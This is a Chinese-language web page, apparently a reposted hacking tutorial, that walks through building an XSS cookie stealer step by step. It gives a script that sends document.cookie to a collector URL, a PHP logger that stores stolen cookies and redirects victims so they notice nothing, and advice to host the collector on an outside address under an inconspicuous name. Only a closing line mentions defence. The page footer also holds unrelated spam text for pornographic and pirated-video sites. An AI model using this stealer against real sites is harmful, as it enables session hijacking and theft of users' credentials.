<span id="mktg5"></span>

<i id="mktg5"><meter id="mktg5"></meter></i>

        <label id="mktg5"><meter id="mktg5"></meter></label>
        最新文章專題視頻專題問答1問答10問答100問答1000問答2000關(guān)鍵字專題1關(guān)鍵字專題50關(guān)鍵字專題500關(guān)鍵字專題1500TAG最新視頻文章推薦1 推薦3 推薦5 推薦7 推薦9 推薦11 推薦13 推薦15 推薦17 推薦19 推薦21 推薦23 推薦25 推薦27 推薦29 推薦31 推薦33 推薦35 推薦37視頻文章20視頻文章30視頻文章40視頻文章50視頻文章60 視頻文章70視頻文章80視頻文章90視頻文章100視頻文章120視頻文章140 視頻2關(guān)鍵字專題關(guān)鍵字專題tag2tag3文章專題文章專題2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章專題3
        問答文章1 問答文章501 問答文章1001 問答文章1501 問答文章2001 問答文章2501 問答文章3001 問答文章3501 問答文章4001 問答文章4501 問答文章5001 問答文章5501 問答文章6001 問答文章6501 問答文章7001 問答文章7501 問答文章8001 問答文章8501 問答文章9001 問答文章9501
        當(dāng)前位置: 首頁 - 科技 - 知識百科 - 正文

        JS寫XSS cookie stealer來竊取密碼的步驟詳解

        來源:懂視網(wǎng) 責(zé)編:小采 時間:2020-11-27 22:25:15
        文檔

        JS寫XSS cookie stealer來竊取密碼的步驟詳解

        JS寫XSS cookie stealer來竊取密碼的步驟詳解:JavaScript是web中最常用的腳本開發(fā)語言,js可以自動執(zhí)行站點組件,管理站點內(nèi)容,在web業(yè)內(nèi)實現(xiàn)其他有用的函數(shù)。JS可以有很多的函數(shù)可以用做惡意用途,包括竊取含有密碼等內(nèi)容的用戶cookie。 Cookie是站點請求和保持特定訪問頁面的信息。Cookie含有訪
        推薦度:
        導(dǎo)讀JS寫XSS cookie stealer來竊取密碼的步驟詳解:JavaScript是web中最常用的腳本開發(fā)語言,js可以自動執(zhí)行站點組件,管理站點內(nèi)容,在web業(yè)內(nèi)實現(xiàn)其他有用的函數(shù)。JS可以有很多的函數(shù)可以用做惡意用途,包括竊取含有密碼等內(nèi)容的用戶cookie。 Cookie是站點請求和保持特定訪問頁面的信息。Cookie含有訪

        JavaScript是web中最常用的腳本開發(fā)語言,js可以自動執(zhí)行站點組件,管理站點內(nèi)容,在web業(yè)內(nèi)實現(xiàn)其他有用的函數(shù)。JS可以有很多的函數(shù)可以用做惡意用途,包括竊取含有密碼等內(nèi)容的用戶cookie。

        Cookie是站點請求和保持特定訪問頁面的信息。Cookie含有訪問的方式、時間、用戶名密碼等認(rèn)證信息等。當(dāng)用戶訪問給定站點時,必須使用cookie;如果攻擊者可以攔截cookie,就可以利用cookie竊取用戶的一些信息。對某個特定的域名,使用JS可以保存或修改用戶的cookie。也就是說,如果攻擊者可以利用JS查看、修改cookie,那么這可以變成一種有價值的黑客技術(shù)。

        基于JS的攻擊可以有效地與代碼注入等技術(shù)相結(jié)合,這可能造成惡意代碼在可信的網(wǎng)站上執(zhí)行。

        下面開始創(chuàng)建XSS cookie stealer

        Step 1: 創(chuàng)建 HTML Test 頁

        首先,創(chuàng)建一個標(biāo)準(zhǔn)的HTML頁

        mkdir cookiestealer
        cd cookiestealer
        touch index.html

        然后,編輯index.html

        nano index.html
        <html>
        <body>
        </body>
        </html>

        測試頁面

        Step 2: 創(chuàng)建Cookie

        創(chuàng)建一個可以插入到cookie中的基本參數(shù)——字符串。這個cookie只能用于本頁面中,同樣的,之后的注入也應(yīng)用于該頁面保存的所有cookie。

         <script type="text/javascript">document.cookie = "username=Null Byte";</script>

        該腳本要插入到HTML的<body>部分,如下:

        如果運行該腳本的頁面打開了,那么就會設(shè)定cookie,但是瀏覽器中不會顯示任何東西。我們可以用document.write函數(shù)直接查看cookie。

        document.write(document.cookie);

        同樣功能的腳本如下:

         <script type="text/javascript">
         document.cookie = "username=Null Byte";
         document.write(document.cookie);
         </script>

        在瀏覽器中打開頁面,就會出現(xiàn)如下的cookie信息:

        說明我們成功地為這個頁面設(shè)置了"username=Null Byte" 的cookie。

        Step 3: 用js腳本竊取Cookies

        我們用來傳遞cookies到服務(wù)器的js字符串使用了document.cookie參數(shù),但是我們用的是document.location中定義的url。

        document.location='http://127.0.0.1/cookiestealer.php?c='+document.cookie;

        在本例中,PHP文件定位到localhost(127.0.0.1)。

        如果目標(biāo)是社交媒體網(wǎng)站,腳本需要注入到該站點中,竊取的cookies要發(fā)送給黑客控制的IP或URL。

        把js代碼嚇到<script>標(biāo)簽中:

        <script type="text/javascript">
         document.location='http://127.0.0.1/cookiestealer.php?c='+document.cookie;
         </script>

        HTML頁面代碼應(yīng)該是下面這樣:

        剩下對cookie進(jìn)行處理的部分需要PHP來處理。

        Step 4: 用PHP處理Cookies

        在上面的例子中,竊取cookie的PHP文件是cookiestealer.php,位于127.0.0.1網(wǎng)址下。

        在實際運行中,不能用cookiestealer.php這么明顯的名字,而且應(yīng)該位于外部IP或URL下。

        首先,在index.html相同目錄下創(chuàng)新PHP文件。

        nano cookiestealer.php

        第一個元素需要定義的是重定向頁面跳轉(zhuǎn)。

        <?php
        header ('Location:https://google.com');
        ?>

        為了不讓用戶意識到可能遭到攻擊,最好重定向用戶到相同域下的其他頁面,這樣用戶就不會意識到。

        重定向完成后,需要其他代碼來處理cookie。

        1. 分配cookie到一個變量;

        $cookies = $_GET"c";

        2. 定義保存cookie的文件,這個文件保存的位置應(yīng)該是我們控制的。

        本例中,文件名為log.txt。

         $file = fopen('log.txt', 'a');

        3. 把上面的兩個參數(shù)的內(nèi)容寫入log文件,即將cookie寫入log.txt。

        fwrite($file, $cookies . "nn");

        代碼如下:

        然后,需要準(zhǔn)備PHP文件的測試環(huán)境。

        Step 5: 測試Cookie Stealer

        在index.html 和 cookiestealer.php相同目錄下,搭建一個測試用的PHP環(huán)境。

        php -S 127.0.0.1:80

        頁面測試成功。

        打開頁面之后,瀏覽器會馬上重定向到預(yù)定義的網(wǎng)站,即Google。

        查看PHP服務(wù)器的日志,我們注意到傳遞給php文件一個參數(shù),而且php代碼執(zhí)行了。

        最后,我們可以檢查我們網(wǎng)站目錄下的log.txt文件來查看cookies。

        cat log.txt

        Log文件中含有cookie的內(nèi)容,說明我們成功的使用js代碼竊取了cookies。

        Step 6: 攻擊

        Cookies含有重要的用戶信息,一般是明文的,有時甚至含有私鑰信息。所以非常重要,使用js代碼注入可以竊取用戶的cookies信息。

        該攻擊可以注入到任何的HTML文件的<script>標(biāo)簽中。常用的檢測XSS的方法是使用alert。

        <script>alert("Alert");</script>

        該腳本會嘗試打開類似下面的alert信息。如果打開了,說明網(wǎng)站易受到xss攻擊。

        在現(xiàn)實的攻擊中,黑客會特別注意PHP文件的位置。如果處理得不好,php文件會容易暴露黑客的位置。如果這種攻擊出現(xiàn)了,那么根據(jù)cookie被發(fā)送和保存的位置,可以追蹤黑客。

        上面的方法說明了JS作為攻擊工具的強大性。JS可以讓web更方便 ,如果某個網(wǎng)站易受到惡意JS注入,這會給用戶和網(wǎng)站帶來巨大的安全威脅。預(yù)防XSS攻擊的重?fù)?dān)落在了web開發(fā)者的身上。如果用戶認(rèn)為運行在網(wǎng)站上的腳本是不可信的,也可以使用NoScript來阻止js代碼的運行。

        總結(jié)

        以上所述是小編給大家介紹的JS寫XSS cookie stealer來竊取密碼的步驟詳解,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復(fù)大家的。在此也非常感謝大家對腳本之家網(wǎng)站的支持!

        聲明:本網(wǎng)頁內(nèi)容旨在傳播知識,若有侵權(quán)等問題請及時與本網(wǎng)聯(lián)系,我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com

        文檔

        JS寫XSS cookie stealer來竊取密碼的步驟詳解

        JS寫XSS cookie stealer來竊取密碼的步驟詳解:JavaScript是web中最常用的腳本開發(fā)語言,js可以自動執(zhí)行站點組件,管理站點內(nèi)容,在web業(yè)內(nèi)實現(xiàn)其他有用的函數(shù)。JS可以有很多的函數(shù)可以用做惡意用途,包括竊取含有密碼等內(nèi)容的用戶cookie。 Cookie是站點請求和保持特定訪問頁面的信息。Cookie含有訪
        推薦度:
        標(biāo)簽: cookie js XSS
        • 熱門焦點

        最新推薦

        猜你喜歡

        熱門推薦

        專題
        Top
        主站蜘蛛池模板: 国产大片51精品免费观看| 免费无码AV片在线观看软件| 亚洲精品无码永久在线观看| 亚洲av无码专区在线观看亚| 免费黄色大片网站| 亚洲国产成人无码AV在线| 热99re久久免费视精品频软件 | 中文字幕亚洲综合久久| 久久精品无码专区免费青青| 亚洲美女aⅴ久久久91| 日本在线高清免费爱做网站| 激情五月亚洲色图| 免费人妻av无码专区| 免费一级毛片在线播放视频免费观看永久 | 最近中文字幕完整免费视频ww| 亚洲国产精品久久66| 午夜在线a亚洲v天堂网2019| 免费网站看v片在线香蕉| 午夜肉伦伦影院久久精品免费看国产一区二区三区 | 91频在线观看免费大全| 亚洲中文字幕精品久久| 亚洲美女在线国产| 久久狠狠躁免费观看2020| 国产亚洲国产bv网站在线| 免费少妇a级毛片| 国产一级淫片a免费播放口| 亚洲天堂一区在线| 四虎影库久免费视频| 永久免费不卡在线观看黄网站| 久久亚洲sm情趣捆绑调教| 黄网址在线永久免费观看 | 国产一级淫片a视频免费观看| 国产久爱免费精品视频| 亚洲婷婷在线视频| 亚洲AV无码一区二区三区国产| 老司机69精品成免费视频| 亚洲一区二区三区丝袜| 中文亚洲AV片不卡在线观看 | 91av免费观看| 全黄A免费一级毛片| 久久国产亚洲精品无码|